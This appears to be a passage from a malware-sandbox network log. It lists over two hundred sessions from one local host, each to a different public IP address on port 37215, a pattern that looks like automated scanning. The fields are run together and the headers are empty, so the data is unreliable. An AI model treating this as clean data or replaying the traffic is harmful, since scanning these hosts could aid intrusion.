                                              12279192.168.2.1553496197.71.203.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12280192.168.2.1548546156.118.137.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12281192.168.2.1547984197.22.190.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12282192.168.2.1539016157.37.252.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12283192.168.2.1553468138.248.75.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12284192.168.2.155075437.166.66.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12285192.168.2.153311294.151.83.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12286192.168.2.1543064121.42.178.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12287192.168.2.1535994138.56.55.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12288192.168.2.1539646190.218.3.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12289192.168.2.154925237.177.182.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12290192.168.2.153343037.122.150.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12291192.168.2.155591652.213.25.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12292192.168.2.1555538222.130.62.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12293192.168.2.153960041.194.66.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12294192.168.2.153951241.141.5.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12295192.168.2.1552028121.53.13.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12296192.168.2.155096631.99.14.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12297192.168.2.155764041.222.105.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12298192.168.2.1545554156.68.129.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12299192.168.2.1540616181.92.254.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12300192.168.2.1543024156.147.180.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12301192.168.2.155412645.224.118.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12302192.168.2.1549834197.71.38.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12303192.168.2.1556764156.168.183.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12304192.168.2.1557504156.222.175.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12305192.168.2.1560724186.65.45.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12306192.168.2.155317494.97.190.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12307192.168.2.154423041.32.147.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12308192.168.2.154722694.199.175.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12309192.168.2.155922094.43.82.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12310192.168.2.153851445.126.243.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12311192.168.2.1536626138.47.250.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12312192.168.2.1541094222.35.94.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12313192.168.2.156016037.50.166.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12314192.168.2.155617094.100.184.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12315192.168.2.1553444181.128.93.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12316192.168.2.1541862122.164.5.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12317192.168.2.154086041.226.245.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12318192.168.2.1554590222.52.175.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12319192.168.2.1538132102.151.199.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12320192.168.2.1551470121.2.134.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12321192.168.2.1554400156.59.193.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12322192.168.2.154786894.253.69.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12323192.168.2.1546228190.157.40.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12324192.168.2.1543956222.21.252.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12325192.168.2.1546000102.254.46.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12326192.168.2.1558058156.78.240.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12327192.168.2.1555778188.183.80.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12328192.168.2.1539006156.81.11.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12329192.168.2.155831852.255.20.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12330192.168.2.154618837.94.76.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12331192.168.2.1551510219.232.195.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12332192.168.2.153319431.236.192.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12333192.168.2.1533020157.219.106.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12334192.168.2.1547280138.216.124.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12335192.168.2.1557016157.39.133.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12336192.168.2.154383041.31.206.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12337192.168.2.1533394222.101.232.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12338192.168.2.155292862.23.195.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12339192.168.2.1535350102.168.2.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12340192.168.2.153984641.169.232.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12341192.168.2.153573241.43.24.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12342192.168.2.1542390156.209.160.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12343192.168.2.154992845.98.220.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12344192.168.2.1534650138.233.149.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12345192.168.2.1550146122.19.242.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12346192.168.2.156014441.47.214.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12347192.168.2.1539130190.65.71.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12348192.168.2.1550940173.237.120.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12349192.168.2.1536156157.122.159.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12350192.168.2.154446245.81.149.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12351192.168.2.1557092102.141.33.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12352192.168.2.1545116197.223.198.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12353192.168.2.1535440156.77.174.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12354192.168.2.1559808186.220.37.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12355192.168.2.1560822138.62.89.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12356192.168.2.153920445.160.239.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12357192.168.2.153414294.234.88.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12358192.168.2.1535486197.170.66.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12359192.168.2.1533324122.197.100.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12360192.168.2.1560936222.146.109.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12361192.168.2.155879241.29.201.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12362192.168.2.1541476181.36.188.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12363192.168.2.155552094.122.180.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12364192.168.2.153834641.92.120.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12365192.168.2.1548662197.156.26.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12366192.168.2.153340637.73.116.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12367192.168.2.153762841.88.150.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12368192.168.2.1544598157.176.244.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12369192.168.2.1547114156.188.74.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12370192.168.2.1533694102.155.33.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12371192.168.2.1535890121.80.190.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12372192.168.2.153567641.38.136.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12373192.168.2.1554816181.74.18.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12374192.168.2.155687245.69.58.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12375192.168.2.1553254156.240.189.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12376192.168.2.1548114138.245.185.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12377192.168.2.1541940190.202.37.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12378192.168.2.155574294.84.79.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12379192.168.2.1558146181.201.213.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12380192.168.2.1553842122.203.9.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12381192.168.2.1544838121.158.183.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12382192.168.2.1538564197.60.137.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12383192.168.2.1535388138.99.138.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12384192.168.2.153884694.253.142.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12385192.168.2.155866094.68.167.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12386192.168.2.1547080102.163.254.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12387192.168.2.1536490102.16.133.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12388192.168.2.1542080165.238.75.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12389192.168.2.1533434190.15.183.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12390192.168.2.1548608181.223.173.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12391192.168.2.154957645.3.108.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12392192.168.2.1549832121.1.190.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12393192.168.2.153429445.183.247.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12394192.168.2.1548562181.57.44.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12395192.168.2.1537306102.108.114.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12396192.168.2.1544594138.55.226.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12397192.168.2.155460894.214.132.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12398192.168.2.154421845.246.43.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12399192.168.2.1539636156.1.9.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12400192.168.2.153814437.177.187.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12401192.168.2.155935494.250.112.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12402192.168.2.1560214156.192.215.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12403192.168.2.154203645.133.245.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12404192.168.2.155897845.105.127.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12405192.168.2.1537850102.62.239.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12406192.168.2.1544654222.168.40.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12407192.168.2.1558352222.101.176.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12408192.168.2.1552660181.143.62.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12409192.168.2.153289431.206.230.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12410192.168.2.1537896181.131.139.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12411192.168.2.1539152186.100.207.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12412192.168.2.1560860186.235.189.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12413192.168.2.1544676122.171.23.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12414192.168.2.153445431.180.205.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12415192.168.2.155676441.247.26.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12416192.168.2.1539852138.9.108.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12417192.168.2.155506841.159.1.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12418192.168.2.1545858122.239.24.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12419192.168.2.1549350121.211.157.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12420192.168.2.154033241.129.106.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12421192.168.2.1560488102.237.86.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12422192.168.2.1554328138.171.126.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12423192.168.2.1540358102.40.198.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12424192.168.2.1558080157.48.27.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12425192.168.2.1535766130.164.248.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12426192.168.2.1547096197.44.246.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12427192.168.2.153984637.108.166.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12428192.168.2.154101631.17.33.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12429192.168.2.1558232156.154.25.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12430192.168.2.155448641.88.126.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12431192.168.2.1553692197.246.5.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12432192.168.2.1535290186.21.77.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12433192.168.2.153858641.62.93.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12434192.168.2.155983631.250.230.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12435192.168.2.1535900190.6.142.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12436192.168.2.1545546121.128.93.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12437192.168.2.1549422121.183.157.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12438192.168.2.1548566136.148.117.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12439192.168.2.154759831.156.33.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12440192.168.2.1547082157.137.152.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12441192.168.2.1541270197.83.62.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12442192.168.2.1540516157.128.52.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12443192.168.2.1538938157.219.187.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12444192.168.2.1541282113.110.179.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12445192.168.2.154982437.113.134.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12446192.168.2.155601094.201.203.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12447192.168.2.1538604181.38.87.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12448192.168.2.1542696121.231.175.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12449192.168.2.1558252222.118.252.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12450192.168.2.156083494.202.60.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12451192.168.2.1541836157.139.29.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12452192.168.2.1549040186.115.34.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12453192.168.2.155715031.27.177.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12454192.168.2.1541108156.165.14.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12455192.168.2.1554108222.88.242.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12456192.168.2.154347494.30.205.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12457192.168.2.1534150197.142.176.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12458192.168.2.1557056186.244.253.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12459192.168.2.155724094.184.105.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12460192.168.2.1553028138.216.15.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12461192.168.2.155199245.81.237.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12462192.168.2.154628631.192.158.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12463192.168.2.1533932186.125.120.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12464192.168.2.155947094.161.165.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12465192.168.2.1540448138.191.18.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12466192.168.2.1549024121.43.42.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12467192.168.2.1555478181.145.120.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12468192.168.2.1543294186.3.30.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12469192.168.2.1554712143.109.192.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12470192.168.2.155768431.92.134.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12471192.168.2.1543100181.22.235.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12472192.168.2.1546662102.38.131.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12473192.168.2.1554012138.40.39.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12474192.168.2.1558292190.85.61.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12475192.168.2.1557172222.29.15.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12476192.168.2.1549752190.3.153.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12477192.168.2.154506445.248.2.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12478192.168.2.154636094.181.79.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12479192.168.2.1558654181.223.248.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12480192.168.2.1552150222.194.56.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12481192.168.2.154512441.165.134.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12482192.168.2.1554298122.118.241.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12483192.168.2.154116637.72.52.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12484192.168.2.154687441.237.195.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12485192.168.2.1533536197.160.206.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12486192.168.2.153814845.171.153.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12487192.168.2.1546208181.167.80.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12488192.168.2.1557390156.28.47.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12489192.168.2.1547086190.186.123.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12490192.168.2.155396845.2.114.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12491192.168.2.154363437.208.202.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12492192.168.2.1534574222.106.19.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12493192.168.2.1549230181.207.216.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12494192.168.2.1534566186.247.86.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12495192.168.2.1551956138.244.121.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12496192.168.2.1538320156.42.44.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12497192.168.2.153458685.19.120.15837215
                                              TimestampBytes transferredDirectionData


